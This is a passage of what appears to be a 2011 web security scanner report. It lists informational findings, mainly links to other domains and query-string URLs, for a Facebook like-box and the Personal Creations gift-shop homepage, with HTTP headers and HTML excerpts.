Host: static.lingospot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LUI=bf037ed82ff04a1a

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/javascript
Accept-Ranges: bytes
ETag: "968558272"
Last-Modified: Wed, 30 Mar 2011 04:37:15 GMT
Vary: Accept-Encoding
Content-Length: 242634
Date: Sun, 04 Sep 2011 01:06:52 GMT
Server: lingo

LINGO.bubble_css = '.lingo_button{cursor:pointer;}.lingo_textfield_20,.lingo_textfield_25{}.lingo_textfield_middle{vertical-align:middle;}.lingo_textfield_ok .lingo_textfield_middle input{background:t
...[SNIP]...
(B7){var Bq=document.createElement("span");if(CG.params.height.charAt(CG.params.height.length-1)=="%"){Bq.style.display="block"}else{Bq.style.display="inline-block"}Bq.id="_lingo_container"+CI;var Bs="<a href='http://www.adobe.com/go/getflash/' target='_blank'><img src='"+brightcove.cdnURL+"/viewer/upgrade_flash_player2.gif' alt='Get Flash Player' width='314' height='200' border='0'>
...[SNIP]...
ems:function(){return T(this.page(),0,this.max_num_items)},_get_preview:function(Bd,Bb){var BZ=this.video_height;var Bc=this.video_width;var Ba=BW.exec(Bd.embed)[1];var Bf=BR.exec(Bd.embed)[1];var Be="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' codebase='http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0' width='"+Bc+"' height='"+BZ+"' id='csPlayer' align='middle'><param name='movie' value='http://eplayer.clipsyndicate.com/cs_api/get_swf' />
...[SNIP]...
<param name='flashvars' value='swfHome=eplayer.clipsyndicate.com&va_id="+Ba+"&wpid="+Bf+"' /><embed id='csPlayer' src='http://eplayer.clipsyndicate.com/cs_api/get_swf' width='"+Bc+"' height='"+BZ+"' allowfullscreen='true' allowscriptaccess='always' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer' flashvars='swfHome=eplayer.clipsyndicate.com&va_id="+Ba+"&wpid="+Bf+"' /></object>
...[SNIP]...

18.24. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FThe-State-Worker%2F174087795950002&width=292&colorscheme=light&show_faces=false&stream=false&header=false&height=62

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/41800_174087795950002_227248_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js
http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js
http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css
http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css

Request

Response

18.25. http://www.personalcreations.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media

The response contains the following links to other domains:

http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W1?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_default.css?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_dynamicnavbarstyles.css?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_lockdown.css?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_ApparelSizeCharts.pdf
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_Ringsize.pdf
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/favicon.ico
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/berries/siteimages/SiteFeedback_sm.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_B2S11_SIT_04.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_CHR11_SIT_01.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_HAL11_SIT_04.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_WED11_SIT_03.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_TIL_193x154_ALL11_SIT_02.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_TIL_193x154_SAL11_SIT_02.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PC_FreePersTest_186x47_HeaderMsg.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-0_0.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-3_7.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_2.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_4.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_5.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_6.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_7.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_8.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_9.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-5_0.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif
http://content.yudu.com/A1tfdc/PerCreation2011Fall2/resources/index.htm
http://link.mercent.com/image.ashx?merchantID=ProFlowers
http://twitter.com/pcgifts
http://www.berries.com/
http://www.berries.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.berries.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.cherrymoonfarms.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.cherrymoonfarms.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.facebook.com/personalcreations
http://www.linkedin.com/company/personal-creations
http://www.proflowers.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.proflowers.com/international?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.proplants.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.proplants.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.providecommerce.com/Careers_Overview.aspx
http://www.providecommerce.com/privacy.aspx
http://www.providecommerce.com/terms.aspx
http://www.redenvelope.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.redenvelope.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/personalcreations/images/Go_Btn.gif
https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif
https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif
https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=PCR
https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr
https://accounts.proflowers.com/ManageReminders.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr
https://accounts.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=PCR
https://cdn.mercent.com/js/tracker.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=t0fzx1lvvnjfpvihrdt22xwk; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=t0fzx1lvvnjfpvihrdt22xwk; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-2,trm-1,xtc-1,ttb-4,nte-3,ntc-2,ntb-2,xta-1,trf-1,tpp-4,tbc-1,ntd-1,tvc-1,tmm-2,xtb-1,tnp-2,tpf-2; domain=.personalcreations.com; expires=Thu, 04-Oct-2012 00:47:54 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txc-1,tkt-1,thp-2,txb-2,tks-2,tms-2,mpsmediapersonalitysplit-2; domain=.personalcreations.com; expires=Sun, 04-Sep-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=9/3/2011 5:47:54 PM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=71; domain=.personalcreations.com; expires=Wed, 07-Sep-2011 00:47:54 GMT; path=/
Set-Cookie: PCR_BrowserId=15a5afb5-0d9c-45c7-84a2-3460492ea8f1; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:47:58 GMT
Content-Length: 167275

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_default.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_dynamicnavbarstyles.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_lockdown.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<li id="proFlowerLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
="nofollow" href="http://www.personalcreations.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
="nofollow" href="http://www.personalcreations.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>

<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/favicon.ico"/>

<div id="Header">
...[SNIP]...
ersonal Creations Homepage" href="http://www.personalcreations.com/sitemap.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:78px;width:212px;"><img height="78px" width="212px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Personal Creations Homepage" border="0" /></a>
...[SNIP]...
<li><a rel="nofollow" class="HeaderLink" href="https://accounts.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=PCR">Your Account</a>
...[SNIP]...
<li><a rel="nofollow" class="HeaderLink" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=PCR">Order Tracking</a>
...[SNIP]...
